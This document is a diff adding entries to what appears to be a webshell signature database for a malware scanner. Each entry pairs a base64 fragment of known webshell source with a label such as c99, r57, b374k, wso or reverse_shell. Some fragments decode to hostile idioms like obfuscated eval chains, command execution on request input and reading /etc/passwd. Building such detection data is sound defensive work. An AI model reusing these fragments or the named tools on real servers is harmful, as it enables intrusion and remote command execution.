+s:64:"OVCBDT0xPUj1SRUQ+Y21kOjwvRk9OVD4nLiR0Yi0+bWFrZXNlbGVjdChhcnJheSg";
+s:16:"tryag[0][0][php]";
+s:64:"A6ICRkaXNmdW5jPTApOw0KKHN0cnRvdXBwZXIoc3Vic3RyKFBIUF9PUywgMCwgMy";
+s:21:"fatalshell[1][0][php]";
+s:64:"NlLnB3ZCI+RmluZCBzZXJ2aWNlLnB3ZCBmaWxlcyBpbiBjdXJyZW50IGRpcmVjdG";
+s:14:"c99[5][0][php]";
+s:64:"ktPcnhUVS9LUWV2USIsImxGd0NmVW9kc1Y2enhwM0s0ZjBlRlgvbHNFIiwiUjFVY";
+s:20:"phpshell[13][0][php]";
+s:64:"IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojMDogTm8gcHJvdGVjdGlvbjsgYW55";
+s:20:"g00nshell[0][0][php]";
+s:64:"T4KPHRyPgogIDx0ZCB3aWR0aD0iNTAlIiBoZWlnaHQ9IjgzIiB2YWxpZ249InRvc";
+s:18:"wacking[1][0][php]";
+s:64:"1lLdys3VDVQVndOekhYU3FPanl1TDFjRHhNeGczdDdYM2NUQ2FTeld0VEFVSC8rZ";
+s:18:"mildnet[0][0][php]";
+s:64:"HQ9MSB2YWxpZ249dG9wPjxUQUJMRSBoZWlnaHQ9MSBjZWxsU3BhY2luZz0wIGNlb";
+s:19:"gnyshell[1][0][php]";
+s:64:"cm1zWyJ3Il1bInIiXT8iIGNoZWNrZWQiOiIiKS4iPiBSZWFkPGJyPlxuIi4NCiAg";
+s:22:"FaTaLisTiCz[6][0][php]";
+s:64:"iIHN0eWxlPSJmb250LXNpemU6MTBwdCI+PGI+U2FmZSBNb2RlIE9OPC9iPjwvZm9";
+s:20:"rootshell[1][0][php]";
+s:547:"bb:XHg2NVx4NzZceDYxXHg2Q1x4MjhceDY3XHg3QVx4NjlceDZFXHg2Nlx4NkNceDYxXHg3NFx4NjVceDI4XHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NVx4MjgnN1gxcmU5czJ6L0RuOVZjd21qZlpxK1BZVHR1N3MyTW5hUTV0MmpUcGN1Z3A2ZVBKc214cmtTMVBrdU5rV2Y3N0M0Q2tSRXF5NDNTNzM4TjF2YnVmcDdGSUVBUkprQVJCQUhUN3hSVm5OSWx1aTRYTzZkN0p4NzJUQy9QTjJkbUh6amw4ZGJaZjd4MmRtZDlLSlhiSEN0UFFDYllIempnS1dZdFpRV0RkRm8zWHZqL3dIS1BNakZOdkdrend4L3ZUbzFkK2hMOWNxMk1GOXRDOWRnTDgvR0tOZTg0Ti9qcXhSbDBQRWt0TjV2YUxrOEFaZEVaV1pBK0w1cHJKS3N3ZFRUeS81eFROdjgyeVdtMEo4c3cxRnhNZm9IWG9XRDBuS0Y=";
+s:19:"filesman[5][0][php]";
+s:64:"m91cDwvYj4iO30NCiAgICAgICRyb3dbXSA9ICI8Yj5QZXJtczwvYj4iOw0KICAgI";
+s:22:"FaTaLisTiCz[2][0][php]";
+s:64:"2PSRfUkVRVUVTVFsnc3VibWl0diddOw0KJG1ldGhvZD0kX1JFUVVFU1RbJ21ldGh";
+s:21:"cybershell[1][0][php]";
+s:64:"ycpLm9uKCdmb2N1cycsIGZ1bmN0aW9uKGUpewoJCWFyZ3MgPSAkKCcjZXZhbEFyZ";
+s:17:"b374k[15][0][php]";
+s:64:"R0dBNy9oZGp4YlkwZWhCWndFTFloOTYwaUlDNUt4SFhEQXBKVUYvMHNDSFp5cXJi";
+s:16:"b374k[1][0][php]";
+s:64:"jEpLiIrJHZiNGE4ODQxN1xuIjsgfSB9IGZ1bmN0aW9uIG5lNjY3ZGE3Nigkdjk1N";
+s:20:"phpshell[29][0][php]";
+s:64:"SkhrV1NPL1VMNFA2UStrV1ZiMDRDM0RNL0h3anpmMkJMTUxybno0ZElWc0lqMics";
+s:20:"phpshell[12][0][php]";
+s:64:"gICcsCidydV9idXR0MycgPT4nICAgICAgICcsCidydV90ZXh0MTInPT4nYmFjay1";
+s:15:"r57[15][0][php]";
+s:64:"uRFVQQ2VQSHBwck5ya2g3NzRMRFJ4RXZMYmhNVEY5WEpVdVBGa3paSlhZeVZCaVh";
+s:15:"cbot[0][0][php]";
+s:64:"JTEVTWydpbWFnZSddWyduYW1lJ107ICR1c2VyZmlsZV90bXAgPSAkX0ZJTEVTWyd";
+s:26:"shell_uploader[19][0][php]";
+s:64:"CAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgIHsKICAgI";
+s:16:"devil[0][0][php]";
+s:64:"WFrOwoKICAgIGNhc2UgImd6ZGVjb2RlIjoKICAgICAgaWYgKGlzX2ZpbGUoJFBhd";
+s:19:"sroshell[0][0][php]";
+s:64:"mQ29yMHFxSERidDZiMFVtRVl4TkViZEMrQnMxOHRmeExkU1B4RU1ScWJkQm9rTGY";
+s:26:"shell_commander[0][0][php]";
+s:64:"pqOE1FYU9ZTU84TUJXOUQwTDRadko5M21ZYXNjWVhQblVIYmJWM1hMR0IveHJiek";
+s:17:"b374k[16][0][php]";
+s:64:"pbmdkaW5ncyAzIiBzaXplPSI1Ij48L2ZvbnQ+PGI+QnlwYXNzIFNoZWxsIEt1bGx";
+s:19:"safemode[6][0][php]";
+s:64:"laWYoc3RydG9sb3dlcigkY21kKSA9PSAiYWJvdXQiKQoJCXsKCQkJcHJpbnQgIkF";
+s:29:"ajax_command_shell[0][0][php]";
+s:139:"bb:XHgyMFw1Mlx4MmZcNDBceDY1XDE2Nlx4NjFcMTU0XHgyOFwxNjNceDc0XDE2Mlx4NWZcMTYyXHg2NVwxNjBceDZjXDE0MVx4NjNcMTQ1XHgyOFwxNDNceDY4XDE2Mlx4MjhcNTA=";
+s:20:"phpshell[27][0][php]";
+s:64:"WbWRsUjA1Q2NrczJkVU41U20wd1oycFZXazFzWkV4TE9GRkJTM00yWmtwWGFHUnR";
+s:26:"shell_uploader[18][0][php]";
+s:64:"ibt9NNQqxwQADsAPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCdJR1ZqYUc4Z0lud";
+s:15:"cmd[12][0][php]";
+s:64:"mNtUndjbVZ6Y3k1MGVIUW5LVHNOQ2lBZ0lDQnplVzFzYVc1cktDY3ZhRzl0WlM4b";
+s:21:"buckethead[0][0][php]";
+s:64:"7IAogICAgICAgIGZvbnQtZmFtaWx5OiBUZXJtaW51cywgRml4ZWRzeXMsIEZpeGV";
+s:23:"fuckphpshell[0][0][php]";
+s:64:"Y2ZzYXZlY29udGVudD4NCjxwcmU+DQojbXlWYXIjDQo8L3ByZT4NCjwvY2ZpZj4N";
+s:17:"cfexec[0][0][cfm]";
+s:64:"1VrR01CemNaT2IvbDZEMUknLCdwU1gyMU82L3c3ajhlVzBIUmdJdGdFM0NIYkVNY";
+s:19:"phpshell[9][0][php]";
+s:64:"nZkVzUwS0NSa2JDa3VKeUJ6ZFdOalpYTnpJQ2N1SkhOMVkyTXVKeUJtWVdsc0lDY";
+s:17:"phpspy[0][0][php]";
+s:64:"AmJiAoQGlzX3JlYWRhYmxlKCIkZGlyLyRmaWxlIikpICkKIAkJCQllY2hvIGJ1aW";
+s:19:"phpshell[0][0][php]";
+s:64:"CmlmICghZW1wdHkoJHdvcmtfZGlyKSkgewogIC8qIEEgd29ya2RpciBoYXMgYmVl";
+s:23:"ayyildiz_tim[0][0][php]";
+s:64:"kc1aGRISnBlQ0E5SUNReE95QU5DaUFnSUNBZ0lDQWdJQ0FnSUcxNUlGd2tZWEpuS";
+s:15:"c100[2][0][php]";
+s:64:"SgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXsKICAKICBpZ";
+s:23:"simple_shell[1][0][php]";
+s:64:"5MWW1WU2MybG9kRUV5WmxoM1FVWTFOazVJZW1Kek9XVlZNbE5HTml0TicuCidiVX";
+s:14:"fx0[2][0][php]";
+s:64:"MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgZHVtcCB2YX";
+s:23:"includeshell[0][0][php]";
+s:64:"dBalB5Vlp2VkNCQmtZSjIvN0F5Q3ZiY2E0SE43SDlJR3FrY0JaTGQxa0NCR0dDb1";
+s:25:"cocacola_shell[1][0][php]";
+s:64:"BOQ21sbUtHbHpjMlYwS0NSZlIwVlVXeWQwYlhBblhTa3BEUW9nZXcwS0lDQWdRSF";
+s:15:"r57[13][0][php]";
+s:64:"C9ESVY+PC9URD48L1RSPgo8PyBpZigkY2hkaXIhPWdldGN3ZCgpKXs/Pgo8VFI+P";
+s:16:"dtool[0][0][php]";
+s:64:"R0lGODlhMQo8P3BocCAKZXZhbChiYXNlNjRfZGVjb2RlKCdhV1lnS0dsemMyVjBL";
+s:15:"cmd[26][0][php]";
+s:64:"IuJGdyb3VwX3dyaXRlLiI+PC9mb250PjwvdGQ+PHRkIGJnY29sb3I9XCIjQ0NDQ0";
+s:17:"andr3a[0][0][php]";
+s:64:"BocE15QWRtaW4vIFxyXG4iOwokZGF0YSAuPSIjIGh0dHA6Ly93d3cucGhwbXlhZG";
+s:17:"backup[0][2][php]";
+s:64:"kZSgkZmlsZSk7CiAgICAgaWYgKGZ1bmN0aW9uX2V4aXN0cygiYmFzZW5hbWUiKSk";
+s:19:"safemode[2][0][php]";
+s:64:"4nKTsKCgogIGVycm9yX3JlcG9ydGluZyhFX1dBUk5JTkcpOwogIGluaV9zZXQoIm";
+s:15:"erne[1][0][php]";
+s:64:"djdyUW9sTnY2Nm5iUEU5UHptMDdudkQxSWI0MWhzVTFWSjdTMEVRbk9yZHZXei9i";
+s:20:"phpshell[22][0][php]";
+s:64:"Y21kWzBdKTsKICAgICAgICAgICR2aG9zdCA9IGV4cGxvZGUoIkAiLCRuaWNrWzFd";
+s:21:"nogrodpBot[0][1][php]";
+s:64:"ydjb3B5X2J5cGFzcyddKSkKICAgICAgIHsKICAgICAgICAgCiAgICAgICAgICBpZ";
+s:21:"mulcishell[0][0][php]";
+s:64:"9Cw0YDQsNC80LXRgtGAMicsCidydV90ZXh0NzEnPT4i0JLRgtC+0YDQvtC5INC/0";
+s:19:"spyshell[0][0][php]";
+s:64:"3Rpb24gbGlzdGluZyAoJGxpc3QpIHsKCWdsb2JhbCAkZGlyZWN0b3J5LCAkaG9tZ";
+s:19:"webadmin[3][2][php]";
+s:64:"mknLCdnTzlTMHViSnlFWmVISW5YWUZLdEEnLCdhWmVjY21TUHdrUWFodkMybk9kd";
+s:19:"phpshell[7][0][php]";
+s:64:"mNCMjY2alFaNGZ5cHhMbXVGT2hZbVNvVzFTTXZ3dnB1dzl0Mnlad1ZXek1LTEtKe";
+s:19:"orbshell[0][0][php]";
+s:64:"XU2gwUVFEdDg5ZkpjdjhDNzQrRDZoTDRSYndOdk5ZN1M1R0xsT0phdGF5QzJzajl";
+s:20:"phpshell[18][0][php]";
+s:64:"IiB2YWx1ZT1cIiIuJHNxbHBhc3MuIlwiIC8+DQoJCQkJCTxpbnB1dCB0eXBlPVwi";
+s:16:"b374k[9][0][php]";
+s:64:"0RRb2dKR2x1YWlBOUlDUmZVMFZTVmtWU1d5SlNSVkZWUlZOVVgxVlNTU0pkT3cwS";
+s:20:"filesman[17][0][php]";
+s:64:"0ZzSUQwZ0owbE8KVTBWU1ZDQkpUbFJQSUNjdUpIUmhZbXhsTGljZ0tDY3VhVzF3Y";
+s:15:"wso[16][0][php]";
+s:64:"bCA9ICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddOwogICAkZGV6ID0gJHB3ZGRpci4i";
+s:14:"cmd[1][0][php]";
+s:64:"gICBlY2hvICI8dGFibGUgYm9yZGVyPScxJyB3aWR0aD0nNjAlJz48dHI+PHRkPiR";
+s:22:"onboomshell[0][0][php]";
+s:64:"nRVg5T0JuVjhYTjd2UUZhK3ZxbWhoQUxSajdyQVQ1ZEgrdndLbHRCcXdYLzNPeFZ";
+s:14:"fx0[0][0][php]";
+s:64:"zaCgkcGF0aCk7DQoJfQ0KDQoJd2hpbGUgKHN0cnBvcygkcGF0aCwgJHBhdHRlcm4";
+s:19:"webadmin[4][2][php]";
+s:64:"Qo/Pg0KPEZPUk0gbWV0aG9kPVBPU1QgRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZ";
+s:26:"shell_uploader[12][0][php]";
+s:64:"UFBQUFRQUJBQWd3QUFBUC8vLy8vTW1jek1tZi9NekptWlpzek16UC8vekFBQSIuC";
+s:20:"ctt_shell[0][0][php]";
+s:64:"9yZWFjaCgkcmV0IGFzICRzaXRlKSBlY2hvKCI8bGk+JHNpdGVcbiIpOw0KICAgIG";
+s:19:"hackerps[1][0][php]";
+s:64:"mRvV3A2WDhiVjl6a0t3enNqUnZ1RFlXcDYyMmZwOERzVzQycnRsWUVjZGgzUnJUb";
+s:20:"stunshell[0][0][php]";
+s:64:"woJCXN1cGVyKG5ldyBCb3JkZXJMYXlvdXQoKSk7CgkJCgkJdGV4dCA9IG5ldyBKY";
+s:19:"javashell[0][0][py]";
+s:64:"YnV0dG9uIG9uY2xpY2s9XCJ0ZXN0X3Byb21wdCgyKVwiIHZhbHVlPVwiIi5ldCgn";
+s:25:"phpfilemanager[3][2][php]";
+s:64:"Z3dZc3ZGQytldmxjS0NjVHhnODFzdzh0WERjRDNaOFFoMERadlkrb2l2ZlcrblBw";
+s:16:"b374k[3][0][php]";
+s:64:"wiY28uaWQiLCJpZSIsImNvLmlsIiwiY28uaW0iLCJjby5pbiIsImlzIiwiaXQiLC";
+s:27:"scanner_jatimcrew[0][0][pl]";
+s:64:"M0NTY3ODkwKS4iKzAiKTsgfSBlbHNlIHsgaWYgKEBtYWlsKCR2MDFiNmUyMDMsIC";
+s:20:"phpshell[30][0][php]";
+s:64:"9ybS5zdWJtaXQoKSI+Cjw/cGhwCi8qIE5vdyB3ZSBtYWtlIGEgbGlzdCBvZiB0aG";
+s:19:"phpshell[4][0][php]";
+s:64:"1QzZHVaWEl2UjNKdmRYQThMMkkrUEM5MFpENDhkR1ErSUNJN0lDQWdJQ0FnRFFvZ";
+s:15:"r57[11][0][php]";
+s:64:"1x4MDBceDAwXHgwMFx4ZTlceGIwXHhmZVx4ZmZceGZmXHhmZlx4MjVceGNhXHg1M";
+s:26:"shell_uploader[17][0][php]";
+s:64:"FI3SUxhN3o4eFFSeVNUWDlTckNpeFFSeVNUWDlSMW8yRFFFSG5yRjJFQjUyRFFua";
+s:27:"brute_force_tool[2][0][php]";
+s:64:"FuYSwgSGVsdmV0aWNhOyBURVhULURFQ09SQVRJT046IG5vbmUKfQouY29udGVudC";
+s:16:"rader[0][0][asp]";
+s:64:"kJJUUpUVVM0R1dNQjhVRFV0UTVDc1Vxdkdudzd4S0dqRUNqR0JDMkl5Q1M5djFTR";
+s:25:"shell_uploader[8][0][php]";
+s:64:"0+JGN5YmVyMTczX2RlY29kZSgpOw0KLyogdGFua3MgZm9yOiBNcl9HYW5EcnVuWC";
+s:21:"cybershell[2][0][php]";
+s:64:"To8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ib2xkbmFtZSIgdmFsdWU9IjBsZCBuY";
+s:20:"nexpl0rer[0][0][php]";
+s:64:"ycsJ2JzaGVsbCc9PidCaW5kc2hlbGwnLCdraWxsJz0+J0tpbGwgU2hlbGwnKTsNC";
+s:15:"goon[0][0][php]";
+s:64:"AgICA8Zm9udCBzaXplPSIyIiBmYWNlPSJUYWhvbWEiPkZ0cCA8L2ZvbnQ+DQogIC";
+s:17:"cpanel[2][0][php]";
+s:64:"biAiLiJQQzkwIFogIi4iWCAiLiJoMCBZICIuIlhKbFlUNG5PMzAgTiBDIi4ibVZq";
+s:23:"simple_shell[2][0][php]";
+s:64:"YWR6MnJ4NHVlNjMyN3ExWg0KUEwzSU52dlp4L3BEL3paZktEN2ROS2Y1MDBJcGsz";
+s:16:"fenix[0][0][php]";
+s:64:"hjb2RlZCBieSBkaW5nZ28pLS0+PC9mb250PjwvY2VudGVyPgoiOwoKCmlmICghaX";
+s:16:"mysql[2][0][php]";
+s:64:"iPg0KPHRleHRhcmVhIHJvd3M9IjE5IiBuYW1lPSJTMSIgY29scz0iODciPic7DQp";
+s:26:"itsecteam_shell[0][0][php]";
+s:64:"bGRlcixUUlVFDQpyZXNwb25zZS53cml0ZSgiRm9sZGVyOiAiICYgc2VsRm9sZGVy";
+s:18:"ntdaddy[1][0][asp]";
+s:64:"vWFMKUVJTQkY4dDZYVE4yWUhiUWx6VVlrNnFpdUlsbFNzdXpxa29HV05iWmh1d2Y";
+s:16:"b374k[0][0][php]";
+s:64:"U0VMRiddLiI/YWN0PW1hbmFnZXImZGVsPSIuJGRjLiI+RGVsPC90ZD4iOwokZGly";
+s:17:"nshell[1][0][php]";
+s:64:"AidGltZW91dCIKCWVsc2U6CQoJCWlmIHB3X2luID09IFBXOgkKCQkJY29ubi5zZW";
+s:21:"phytonshell[0][0][py]";
+s:64:"nBvcGVuIikpew0KZnVuY3Rpb24gbXlzaGVsbGV4ZWMoJGNvbW1hbmQpIHsNCmlmI";
+s:21:"locusshell[1][0][php]";
+s:64:"jbHVkZSgiL2V0Yy9wYXNzd2QiKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTs";
+s:20:"rootshell[2][0][php]";
+s:64:"G1wV0FPQVdYUTBuNUJRPT0nKSkpOyB9DQplbHNlIHsgZXZhbChnemluZmxhdGUoY";
+s:25:"shell_uploader[5][0][php]";
+s:64:"+PGJyPic7DQplY2hvICdTZXJ2ZXIgaW5mb3JtYXRpb25zPGJyPjxicj4nOw0KZWN";
+s:19:"backdoor[0][0][php]";
+s:64:"QzQ4Vk5lekhPdG83bUVzNHZ6V0hEcHFHdGxhN0g3c2Q5UCs3QjZISjBWcXg4dTd5";
+s:29:"gohack_powerserver[0][0][php]";
+s:64:"AgICAgICAgICAgbXkgJG5hdHJpeCA9ICQxOw0KICAgICAgICAgICAgbXkgJGFyZy";
+s:18:"shellbot[2][0][pl]";
+s:64:"YoICRfUE9TVFsnX2VkaXQnXSApIHsKCWVjaG8gJzxicj48Zm9ybSBuYW1lPSJ0ZX";
+s:15:"cmd[32][0][php]";
+s:64:"GUwXHg2Nlx4ODlceDQ1XHhjZVx4ZThceGFhXHhmMlx4ZmZceGZmXHg4M1x4YzRce";
+s:24:"shell_exploit[0][0][php]";
+s:64:"FrOwoJCWNhc2UgNToKCQkJZm9yKDskX1BPU1RbJ3AyJ10gPD0gJF9QT1NUWydwMy";
+s:19:"orbshell[1][0][php]";
+s:64:"RfUE9TVFsiZiJdID8+DQo8PyB9ID8+DQo8PyAkdGVzdF9mdW5jID0gY3JlYXRlX2";
+s:14:"cmd[9][0][php]";
+s:64:"RQWZna3JNMndDcDVlV0RNNHJ3eUMvV0RwUzN0Q3R0RVE2WTJrY1pGTm9wRG9pSjR";
+s:19:"akatsuki[0][0][php]";
+s:64:"TRVJWRVJfVkFSU1snSFRUUF9YX0ZPUldBUkRFRF9GT1InXSkpewogIGVjaG8gIjx";
+s:14:"gfs[1][0][php]";
+s:64:"XTXhmREN3U0xHTXVwSUV4S0VuVXAvd2xkcWRYdlJidVBocGhZMXE2cmI4VmZKZ0Z";
+s:17:"b374k[10][0][php]";
+s:64:"jA3Q2lScFlXUmtjajFwYm1WMFgyRjBiMjRvSkhSaGNtZGxkQ2tnZkh3Z1pHbGxLQ";
+s:17:"coderz[0][0][php]";
+s:64:"kNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUga";
+s:19:"priv8_scr[1][0][pl]";
+s:64:"cxJzsKCmlmKCRfU0VTU0lPTlsnYW4nXT09MCl7CmVjaG8gJGhlYWRlcjsKZWNoby";
+s:25:"antichat_shell[0][0][php]";
+s:64:"w+CjxoZWFkPgo8dGl0bGU+UnUyNFBvc3RXZWJTaGVsbCAtICIuJF9QT1NUWydjbW";
+s:14:"cmd[2][0][php]";
+s:64:"PL8ICAgICAgICAgICAgXCIgPiI7CmVjaG8gIgo8aHIgd2lkdGg9XCIxMDAlXCIgc";
+s:21:"cybershell[0][0][php]";
+s:64:"E1UitQRkJRM0VvbWdSNHRibHpZZUFWbjQvU3c1NmxqWkNwQjVtWHBxbmM5RkZBMW";
+s:20:"hostdevil[1][0][php]";
+s:64:"V9lbmQxLiRmZTsKfQppZigkbXlzcWxfb258fCRtc3NxbF9vbnx8JHBnX29ufHwkb";
+s:15:"r57[16][0][php]";
+s:64:"gkbiwkdHh0PScnKQp7CmVjaG8gJzx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW";
+s:14:"r57[8][0][php]";
+s:64:"kcmVzOw0KCQkJfQ0KCQl9DQoJCSRzdWNjZXNzID0gMDsNCgkJJGF0dGVtcHRzID0";
+s:14:"wso[1][0][php]";
+s:64:"WFuZCddKSkNCg0KCQkJCQl7DQoNCgkJCQkJCXByaW50ICI8cHJlPiI7DQoNCgkJC";
+s:20:"ironshell[0][0][php]";
+s:64:"CAgICAiMjE4XC4xOFwuMTc0XC4yNyIsDQogICAgICAgICI2NVwuMzNcLjg3XC45N";
+s:24:"spam_trustapp[1][1][php]";
+s:64:"mMjBmODgzZSI7CiRjb2xvciA9ICIjZGY1IjsKJGRlZmF1bHRfYWN0aW9uID0gJ0Z";
+s:20:"filesman[15][0][php]";
+s:64:"SgkX1NFUlZFUlsnSFRUUF9IT1NUJ10uJ19NeVNRTC5zcWwnKTsKCgoKCWhlYWRlc";
+s:17:"phpspy[1][0][php]";
+s:64:"PD9waHAgcGFzc3RocnUoZ2V0ZW52KCJIVFRQX0FDQ0VQVF9MQU5HVUFHRSIpKTsg";
+s:26:"accept_language[0][0][php]";
+s:64:"kX1BPU1RbJ3AxJ10gPT0gJ3llcycpCgkJaWYoQHVubGluayhwcmVnX3JlcGxhY2U";
+s:20:"filesman[21][0][php]";
+s:64:"0ic2NhbnR5cGUiPg0KICAgICAgICAgPG9wdGlvbiB2YWx1ZT0iMSI+DQogICAgIC";
+s:20:"filesman[25][0][php]";
+s:64:"wZSIsICJ3IiksICAvLyBzdGRvdXQgaXMgYSBwaXBlIHRoYXQgdGhlIGNoaWxkIHd";
+s:22:"shellatildi[1][0][php]";
+s:64:"3JzJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQpAc2V0X21hZ2ljX3F1b3Rlc";
+s:20:"1n73ction[0][0][php]";
+s:64:"kYXRhJ30uDQojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmc";
+s:19:"cgi-shell[0][0][pl]";
+s:64:"yaW5nIGRzdFBhdGgpIHsKCWJvb2xlYW4gYlJldCA9IHRydWU7CgkKCXRyeSB7Cgk";
+s:23:"jspwebshell[0][0][java]";
+s:64:"BpYjNWMGNIVjBJaUIyWVd4MVpUMGlKenNnWldOb2J5QWtiM1YwY0hWME95QmxZMm";
+s:15:"cmd[33][0][php]";
+s:64:"gPD9waHANCi8qIE5vdyB3ZSBtYWtlIGEgbGlzdCBvZiB0aGUgZGlyZWN0b3JpZXM";
+s:23:"ayyildiz_tim[1][0][php]";
+s:64:"0N3ZW04L1QvY3ZoY2EyZEszVktKL2U3K3k4WGR5OEhlaTU3TU05WXBVdy9Iby8za";
+s:15:"c99[18][0][php]";
+s:64:"GZ1bmN0aW9uX2V4aXN0cygnb2NpX2Nvbm5lY3QnKSkgDQogICAgICAgICR0ZW1wW";
+s:20:"filesman[13][0][php]";
+s:64:"X3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOwokbGl6MD1zaGVsbF9leGVjKCRfUE9T";
+s:18:"lizozim[0][0][php]";
+s:64:"gbnVsbDsKJHVkID0gdXJsZW5jb2RlKCRkKTsKPz4KPGh0bWw+PGhlYWQ+PG1ldGE";
+s:14:"c99[6][0][php]";
+s:64:"GVjaG8gIiRfU0VSVkVSW1BIUF9TRUxGXSIgOyA/PiIgbWV0aG9kID0gInBvc3QiP";
+s:22:"remoteshell[0][0][php]";
+s:64:"VcMTYyXHg3MFx4N2NcMTU1c25cMTQyXHg2Zlx4NzR8Y1x4NzJcMTQxXDE2N2xlcn";
+s:26:"shell_uploader[16][0][php]";
+s:64:"wM3pXS25SZkliRmh0UDVxRW1HN1VxWUxQVExoVHRUd09vbHJMU0JDd3QxdkNhRkF";
+s:21:"nogrodpBot[1][1][php]";
+s:64:"Bpc2Foa2FuIGRlbmdhbiBzcGFzaQ0KDQovKioqIEFkbWluICoqKi8NCiRhZG1pbi";
+s:21:"gaulircbot[0][2][php]";
+s:64:"2hvICIgIDx0ZCBub3dyYXAgY29sc3Bhbj1cIjZcIiBzdHlsZT1cInBhZGRpbmctb";
+s:15:"erne[0][0][php]";
+s:64:"NpemU9MTEwPjwvZm9ybT48L2NlbnRlcj48YnI+CiI7CmlmKEAkX1BPU1RbJ3NoJ1";
+s:14:"img[0][0][php]";
+s:64:"x1c2goKTsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIHJlcGxhY2VOZX";
+s:19:"pwnshell[0][0][jsp]";
+s:64:"VydmVyWzFdLCAkbGluZVswXSwgJHRtcCkgKSB7DQ0KCQkJCQkJCSRzdWNjZXNzKy";
+s:19:"filesman[8][0][php]";
+s:64:"oJfQ0KfQ0KDQp3aGlsZSgkbGV2ZWwtLSkgY2hkaXIoIi4uIik7DQoNCiRjaCA9IG";
+s:26:"itsecteam_shell[1][0][php]";
+s:64:"I5MDRiOGNmYzQ4NDdjNTViNiI7IGlmKGlzc2V0KCRfUkVRVUVTVFsncHVmZG1yJ1";
+s:15:"cmd[29][0][php]";
+s:64:"VFU1RbJ2NtZCddKSl7DQogICAgICAgIGVjaG8gIjxwcmU+IjsNCiAgICAgICAgJG";
+s:15:"cmd[20][0][php]";
+s:64:"VQsICdVVEYtOCcpOwogICAgICB9CgogICAgICB3aGlsZSAoIWZlb2YoJGlvWzJdK";
+s:20:"diveshell[0][0][php]";
+s:64:"MTAwIiB2YWx1ZT0iPD8gZWNobyAkY3VyZGlyOyA/PiI+PC90ZD4KICAgICAgPHRk";
+s:20:"lamashell[1][0][php]";
+s:64:"lIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVsdGlwYXJ0L2Zvcm0tZGF0YT4gJG5vd2F";
+s:20:"phpshell[23][0][php]";
+s:64:"gdGVybXMgYXJlIG5vdCBhY2NlcHRhYmxlIHRvIHlvdSwgdGhlbg0KLy8gZG8gbm9";
+s:24:"reverse_shell[0][0][php]";
+s:64:"iBlbmNvdW50ZXJlZCBhbiBpbnRlcm5hbCBlcnJvciBvcgptaXNjb25maWd1cmF0a";
+s:19:"mohajer22[0][0][pl]";
+s:64:"oSWlGMUlIRWljU0FpSXlZaElpQXNJeVFnZHlFaEp5Y2lkaWNoSVNFaElTQXRJeTB";
+s:20:"filesman[19][0][php]";
+s:64:"lRzNYUjRkb3hnelJJV2NWTW5jcUV3TFc1enVwOVdjWWNtemVqUDdWNndMald3OW8";
+s:18:"webroot[0][0][php]";
+s:64:"hvICR0YWJsZV91cDI7CmVjaG8gJGZvbnQ7CmVjaG8gIjxiPiIud3MoMjcpLiRsYW";
+s:14:"r57[0][0][php]";
+s:64:"0tLS0tLS0tLS0tCgogIERpbSBvU2NyaXB0CiAgRGltIG9TY3JpcHROZXQKICBEaW";
+s:14:"cmd[0][0][asp]";
+s:64:"lYT4iOw0KJHNmbnQ9Ijxmb250IGZhY2U9dGFob21hIHNpemU9MiBjb2xvcj0jMDA";
+s:13:"mm[0][0][php]";
+s:64:"NDUk9MTEJBUi1BUlJPVy1DT0xPUjogIzM2M2Q0ZTsKU0NST0xMQkFSLVRSQUNLLU";
+s:18:"nstview[2][0][php]";
+s:64:"TIuNi40LXBsMi8nLAonL3BocE15QWRtaW4tMi42LjQtcGwzLycsCicvcGhwTXlBZ";
+s:29:"phpmyadmin_exploit[0][0][php]";
+s:64:"MlFmYnpKTXp3aCtCSUsKYkFPSTRjSG82V2M0ZytYTGhFT29peGV0eDlEbjNOamdP";
+s:16:"b374k[2][0][php]";
+s:64:"pOOVJaMEY2b21VNDY0Y0lPMEFjMUdyWUxkeWhMRDdUUHNEL3B0TSt5YW1sRDl6dD";
+s:26:"shell_uploader[13][0][php]";
+s:64:"eGtyb3JpID0gImE4YTQ3YzBhMTY3N2YwN2NhZWUwOGFkZmViNTkzZWQwIjsgaWYo";
+s:15:"cmd[35][0][php]";
+s:64:"vY2tldCk7DQp9DQpzZW5kcmF3KCRJUkNfY3VyX3NvY2tldCwgIlBSSVZNU0cgJHB";
+s:19:"empixcrew[0][0][pl]";
+s:64:"wvdHI+IjsNCg0KcHJpbnQgIjx0cj48dGQ+PGI+Q2hhbmdlIGRpcmVjdG9yeTo8L2";
+s:16:"worse[1][0][php]";
+s:64:"VVJFJ10uIjwvZm9udD48L3RkPiI7CnByaW50ICAgICI8L3RyPiI7CnByaW50ICAg";
+s:15:"winx[0][0][php]";
+s:64:"ZTNZYzJaWDdsdWN2NllGejZBZ0RlNXFaSGUxNStndkxvU01mNHlHQmx2NHZpMHhV";
+s:15:"wso[11][0][php]";
+s:64:"PXt9KTt2YXIgZz1jLmIuY2xpY2s7Z3x8KGc9Yy5iLmNsaWNrPXt9LGMub25jbGlj";
+s:17:"b374k[14][0][php]";
+s:64:"lx4ZjVceGQ2XHhjY1x4NmVceGJhXHgwZlx4MjRceGM2XHg5Y1x4NGVceGM0XHhlN";
+s:15:"c99[15][0][php]";
+s:64:"y8vOVRZNDA1V2ZxT212akkrYkhvYW9Rc01ReFIrdXVibjdidSswZi8vL3lINUJBR";
+s:17:"coderz[1][0][php]";
